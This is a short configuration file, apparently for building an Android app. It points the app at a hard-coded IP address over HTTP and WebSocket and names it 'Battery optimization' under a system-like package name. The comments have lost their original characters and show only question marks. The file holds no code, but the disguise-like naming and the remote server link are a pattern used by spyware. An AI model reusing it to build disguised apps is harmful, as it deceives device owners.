# ============================================================
# ??????? APK ???? ??clean????
# ============================================================

# HTTP
server.host=47.93.162.24

# HTTP ??
server.port=80

# WebSocket
websocket.url=ws://47.93.162.24/ws

# ????
app.package=com.android.batteryoptimization

# ????
app.name= Battery optimization


